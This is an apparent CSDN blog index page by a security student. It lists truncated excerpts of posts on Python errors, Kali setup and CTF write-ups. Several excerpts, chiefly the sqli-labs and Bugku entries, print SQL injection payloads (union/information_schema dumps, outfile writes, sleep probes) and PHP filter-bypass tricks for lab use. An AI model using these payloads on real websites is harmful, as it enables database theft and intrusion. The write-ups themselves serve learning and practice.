自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

csu_vc的博客

始于代码,陷于安全,想学的太多,懂得的太少

  • 博客(78)
  • 资源 (1)
  • 收藏
  • 关注

原创 root cause java.lang.NoClassDefFoundError: org/apache/struts2/spi/RequestContext

javax.servlet.ServletException: Filter execution threw an exception root cause java.lang.NoClassDefFoundError: org/apache/struts2/spi/RequestContext java.lang.ClassLoader.defineClass1(Native Method)...

2018-08-31 16:15:00 723

原创 AttributeError: 'module' object has no attribute 'OPEN'

这个主要是由于新旧版本不同所致 在使用wx的时候dlg = wx.FileDialog( self, message="Choose a file", defaultDir=self.currentFolder, defaultFile="", wildcard=wildcard, ...

2018-05-21 13:49:17 9082

原创 AttributeError: 'module' object has no attribute 'xxx'

假若大家写python的时候曾经遇到过这样的玄学问题 AttributeError: ‘module’ object has no attribute ‘xxx’ 一会好,一会不行。 其实,是因为一个很基本的细节 1. 命名py脚本时,不要与python预留字,模块名等相同 另外,还有另一个原因 2. 删除该库的.pyc文件(因为py脚本每次运行时均会生成.pyc文件;在已经生成.py...

2018-04-06 20:37:36 1192

原创 黑板客爬虫闯关

#!/usr/bin/env python# -*- coding: utf-8 -*-# @Date : 2018-04-03 22:34:21# @Author : csu_vc(s4ad0w.protonmail.com)# @Link : http://blog.csdn.net/csu_vc# @Version : python3.6import reques...

2018-04-04 12:00:08 336

原创 字符串操作—分割字符串

#!/usr/bin/env python# -*- coding: utf-8 -*-# @Date : 2018-03-28 10:56:01# @Author : csu_vc(s4ad0w.protonmail.com)# @Link : http://blog.csdn.net/csu_vc# @Version : python3.6import osimp...

2018-03-28 11:31:45 272

原创 强网杯—share your mind了解RPO+XSS+CSRF

RPO(Relative Path Overwrite)1.What is RPORPO(相对路径覆盖)是一种通过覆盖目标文件来利用相对URL的技术。要了解这项技术,我们必须首先研究相对网址和绝对网址之间的差异。绝对URL基本上是包含协议和域名的目标地址的完整URL,而相对URL则是不指定域或协议,并使用现有目的地来确定协议和域。 Absolute URLhttps://gr...

2018-03-27 22:27:54 2218 3

原创 CBC翻转攻击,了解一下!

通过一道题了解CBC翻转攻击CBC翻转攻击方法的精髓在于:通过损坏密文字节来改变明文字节。(注:借助CBC内部的模式)借由此可以绕过过滤器,或者改变用户权限提升至管理员,又或者改变应用程序预期明文以尽猥琐之事。下面介绍一下CBC字节翻转攻击的原理: 上图CBC加密的原理图Plaintext:待加密的数据。 IV:用于随机化加密的比特块,保证即使对相同明文多次加密,也可以得...

2018-03-19 23:10:35 18776 9

原创 数字签名过期

Invalid signature for Kali Linux repositories : “The following signatures were invalid: EXPKEYSIG ED444FF07D8D0BF6 Kali Linux Repository”今天打算把kali更新一下,发现出现上面的问题,google之后发现是由于数字签名过期所致: 请注意,如果您在一段...

2018-02-28 18:37:56 5342

原创 限制提权与sudo -s

自己琢磨,如有错误,敬请指出sudo -s-s:执行指定的shell;如果后面不指定shell则为该用户默认的shell 比如 那么当我在vc用户下执行 sudo -s 会默认的切换到vc的默认shell 限制提权第一种方法是修改/etc/pam.d/su文件 这里介绍第二种chmod 700 /bin/su这样就可以了

2017-12-15 13:25:01 3496

原创 sed之妙用

当使用sed替换文件中的内容的时候 如何匹配以指定内容开头的位置,而不是匹配所有在文件中出现的位置呢? 使用^来解决sed 's/^PASS_MAX_DAYS/PASS_MAX_DAYS 90'所有以PASS_MAX_DAYS开头的行在该值后面都会被替换,并且,可以看到注释中的相同内容因为是以#开头,因此没有被匹配 然而如果只使用^匹配,它会只把前面的内容替换,当前行后面的内容并不会被修改

2017-12-15 11:51:30 306

原创 常用链接记录

1、音频频谱分析网站(DTMF解码)http://dialabc.com/sound/detect/2、base64解码https://www.base64decode.org/3、md5解密https://somd5.com/4、二维码解析http://cdn.malu.me/qrdecode/5、维吉尼亚密码解码https://atomcated.github.io/Vigenere/6、CMS

2017-12-08 15:33:07 727

原创 hexo+github时遇到的坑

0x00 理解hexo其实我一开始以为hexo是类似于wp那种的博客,经过一番折腾之后才明白hexo只不过是一个静态的部署环境0x01 deploy在_config.yml配置deploy时需要在:后面加空格 这个是yml的特性

2017-12-04 21:28:42 645

原创 bash脚本的坑

最近在写bash脚本的时候遇到了很多坑记录一下./1.sh:行5: =: 未找到命令这个是因为在bash里的赋值=号前后不应该留空格另外./1.sh:行8: $'[[192.168.0.9\n192.168.0.9!=]]': 未找到命令在if判断中使用[]需要注意两层[]之间需要留一个空格

2017-12-04 18:56:05 232

原创 kali开启桥接无法获取IP

这个是博主自开始玩kali以来一直都遇到的一个问题。 今天又遇到了所以记录一下,免得又忘记了 首先从DNS开始排查,文件位于/etc/resolv.conf不过通常没什么问题。 然后查看interfaces文件/etc/init.d/interfaces也没问题 最重要的来了,大坑,自己机子上有多块虚拟网卡,所以心想可能桥接到不能连网的虚拟网卡了,所以在网络配置里把桥接的网卡指定为主机的网卡

2017-11-08 19:39:10 4907

原创 MS17_010

漏洞信息 多个 Windows SMB 远程执行代码漏洞 当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。 为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。从内存进程获取敏感信息。修补方法

2017-11-07 12:53:03 2047

原创 decode() missing 1 required positional arguement: 'output'

cipher=base64.decode(cipher)报错 decode() missing 1 required positional arguement: ‘output’在python3里需要指定其为base64.b64decode()解决办法According to the documentation, base64.decode takes 2 arguments: input and

2017-11-05 12:00:43 4178

原创 DNS信息搜集学习

0x01 whois知道目标域名之后,可以利用whois来获取域名的注册信息用法whois 域名0x02 dig 常用的dig参数 -C,设置协议类型比如IN(默认类型)、CH和HS -f,支持从一个文件里读取域名内容进行批量查询 -x,逆向查询,查询IP地址到域名的映射关系 -any 返回全部的记录 -short 返回精简查询内容CNAME和A记录 -no

2017-11-05 11:22:14 396

原创 CTF中常见的php函数绕过(保持更新)

is_numeric()用于判断是否是数字,通常配合数值判断is_numeric(@$a["param1"])?exit:NULL;if(@$a["param1"]){ ($a["param1"]>2017)?$v1=1:NULL;}//param1不能是数字,但又要比2017大,利用数组$pos = array_search("nudt",$a["param2"]);$pos ==

2017-11-03 21:47:00 10169 2

原创 Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)

查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";

2017-10-28 13:51:55 9317 3

原创 Bugku——cookie欺骗

看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python# -*- coding: utf-8 -*-# @Date : 2017-10-28 09:36:41# @Author : csu_vc# @Link : http://blog.c

2017-10-28 10:25:29 8348 1

原创 Bugku——web6

又是一道编程题,正好给自己练手# coding:utf-8import requestsfrom base64 import b64decodes=requests.Session()a=s.get('http://120.24.86.145:8002/web6/').headers['flag']flag=b64decode(a)uflag=str(flag,encoding="utf

2017-10-28 09:23:17 1701

原创 a bytes-like object is required,not 'str'

今天用python3的request写爬虫的时候遇到这个问题 查了很多,都没用,最后找到自己的解决办法 因为python3是bytes-like的,所以我们需要用split的话只能把它转为str # bytes object b = b"example" # str object s = "example" # str to bytes bytes(s, encodin

2017-10-28 09:21:33 67787

原创 Bugku——成绩单(web)

可以大概判断出有四个字段 直接上payload-1' union select 1,2,3,database()#-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#-1' union select 1,2,3,group_conc

2017-10-27 19:26:21 2336

原创 南宁杯CTF以及中科大CTF的一点总结

首先谈谈中科大吧,考的知识比较偏向数理,比较基础的是类似于正则表达式,重定向,隐写等等看不见的字——利用技巧把flag隐藏,不用搜索或者全选无法察觉、、、、、、科大学生家长的日常——重定向,发现科大学生的家长们是真的很热闹啊……被入侵的云端——拿到一个不知道什么的packet,先file看看,再strings看看,然后binwalk,发现开头0x2A,把它转一下格式导入到wireshark可以

2017-10-26 09:33:24 1841

原创 南宁市第二届网络与信息安全技术竞赛——web200

这道题一开始只给了一个页面,提示u have to echo to the server。 仔细想了想,感觉可能是想让我们传参数把,有过经验的大佬不要嘲笑,也许你们一眼可以看出来使node.js的漏洞,但是毕竟我还是小白。 自然用小白的分析思路啦,首先用burp查看了中间是否有隐藏信息,或者是否发生了重定向,对包的头部信息仔细看了一下发现了几个不常见属性,比如发送包里 If-None-M

2017-10-23 00:12:31 946

原创 USTC中科大信息安全竞赛——黑客猜奇偶(1.0)

这道题目还是很有意思的,主要是逻辑上的漏洞,因为你的字符串是可以控制可以修改的,所以把字符串置空。这样每次就对服务器生成的字符串做MD5,而服务器的MD5是你可以获取的#!/usr/bin/env python# -*- coding: utf-8 -*-# @Date : 2017-10-18 21:42:48# @Author : csu_vcimport requestsimp

2017-10-22 13:01:34 1600

转载 宽字节注入(解锁新姿势好吗!!)

0x00 前言由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些Mysql中转义的函数addslashes,mysql_real_escape_string,mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义,这里讨论一下利用宽字节注入绕过这些函数。0x01 什么是宽字节那

2017-10-13 00:52:57 1513

原创 /usr/bin/python^M: bad interpreter: No such file

今天在做heartbleed attack lab的时候,按照步骤把expoilt保存下来之后,直接拉到ubuntu虚拟机,发现,无论怎么弄,都无法执行,并且提示 苦思良久,琢磨了很多方法,都不靠谱,最后才发现问题 出错原因 这是不同系统编码格式引起的:在windows系统中编辑的.sh .py文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。一般是因为windows行结

2017-10-12 14:55:42 502

原创 sqli-labs学习记录(五)

0x15 less15 and less16第15和16课都是基于time and 布尔型post注入这两节课无论什么,都无法得到错误信息了,什么也没有,只能考虑延时首先盲测一下 可以利用if和sleep来获取信息,比如database(),@@datadir,user(),等等0x17 less-17使用updatexml 或者extractvalue都可以0x18 less-18http头注

2017-10-07 10:51:22 316

原创 sqli-labs学习记录(四)

0x10 less-10http://localhost/sqli-labs-master/Less-10/?id=1" and sleep(5)-- + //判断后台闭合方式http://localhost/sqli-labs-master/Less-10/?id=1" and if(substr((select database()),1,1)='s',sleep(5),null)-- + /

2017-10-06 16:46:31 374

原创 PHP文件上传常见问题

在做一个PHP文件上传系统的时候,使用move_uploaded_file进行文件上传,提示下面两个warning,不能成功上传文件 一个是cannot open steam 一个是cannot move 一开始查阅资料,网上千篇一律说是权限问题,因此加上了目录权限,但是并没有卵用 换一个思路,把相对路径换成绝对路径,也没用 最后发现是编码问题 因为php字符编码和windows不同

2017-10-02 20:14:20 188

原创 渗透思路总结(持续更新)

针对网站程序一、查找注入,注意数据库用户权限和站库是否同服。二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、阿帕奇等。四、查找编辑器,比较典型的ewebeditor、fckeditor等等。五、查找phpmyadmin等管理程序,可以

2017-10-02 13:23:43 1218

原创 sqli-labs学习记录(三)

0x07 less-7http://localhost/sqli-labs-master/Less-7/?id=1"-- +``` //首先要测试后台大概的查询语句http://localhost/sqli-labs-master/Less-7/?id=0')) union select * from users into outfile ‘路径’ //可以导出文件http://loc

2017-10-02 11:03:57 249

原创 sqli-labs学习记录(二)

0x04 less-4在网上发现了另一种姿势避免limit的多次使用,就是用group_concat来一次性列出,在数据量比较少的时候很实用!后台查询语句$id = '"' . $id . '"';$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";payloadhttp://localhost/sqli-labs-master/Less-4/

2017-10-01 16:53:30 268

原创 sqli-labs学习记录(一)

0x01 less-1‘$id’ 单引号注入这里写代码片http://localhost/sqli-labs-master/Less-1/?id=14' order by 3-- + //猜字段http://localhost/sqli-labs-master/Less-1/?id=14' union select 1,2,3-- + //查看内容 发现服务器依旧只返回了第一条查询的信息,

2017-09-30 17:01:19 1008

原创 Kali linux渗透测试(七)

今天学习的工具是 NETCAT,不过据说有点过时了,仅供参考connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [-options] [hostname] [port]options: -c shell commands as `-e'

2017-09-24 11:24:23 387

原创 Kali linux渗透测试(六)

0x00 定制网络配置kali 虽然默认集成了很多工具包,但是它并不是完整的,需要继续完善网络配置-1临时IP地址(默认通过DHCP获取)重启之后就会失效-dhclient eth0 //通过该命令可以自动获得指定网卡的IP-ifconfig eht0 192.168.1.1/24 //手动指定ip地址要指定掩码 如果想上网,那么要指定网关 也就是给电脑添加一条路由route add

2017-09-23 16:32:14 456

原创 Kali linux渗透测试(五)

0x00 简单的shell脚本用vi编辑#! /bin/bash //默认的所有脚本的起始行,意思是使用bash来进行下面所有语言段的解释echo -n "IP : " //-n表示当显示echo内容之后,光标所处位置不换行,还在内容后面read ip //定义一个变量,shell脚本里的一个语句语言,把输入保存到ip变量中echo "your ip is

2017-09-23 12:52:33 407

原创 网络安全名词解析

0x00 OSI安全体系结构 OSI安全体系结构实在OSI协议体系结构的内容上发展而来,OSI安全体系结构作为一种组织提供安全服务的任务途径是非常有效的。 更重要的是,用这个结构作国际标准,计算机和通信厂商也已经开发出符合这个结构化服务和机制标准的产品和服务安全特性。OSI安全体系结构可分为以下三个方面安全攻击(Security attack):损害机构所拥有信息的安全的所有行为。安

2017-09-23 08:19:20 1635

原创 计算机体系结构(二)

接上节内容继续0x00 存储系统首先要记得是存储层次:如果仔细的分可以按下面的分法第一层:寄存器堆第二层:先行缓冲站第三层:高速缓冲存储器第四层:主存储器第五层:联机存储器第六层:脱机存储器第1-3层在CPU芯片内部,第4层主存储器在主板上,第5层在机箱内(硬盘),第6层依靠手工挂载(VCD.DVD.磁带.刻录机等)寻址空间 指的是程序猿可以使用的存储器容量、即每个程序的大小,2的

2017-09-22 13:41:21 1819

JButton的UI重新设计

基于basicUI的JButton重写,下载后直接使用,直接new就可以了…………………………………………………………………………

2017-09-10

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除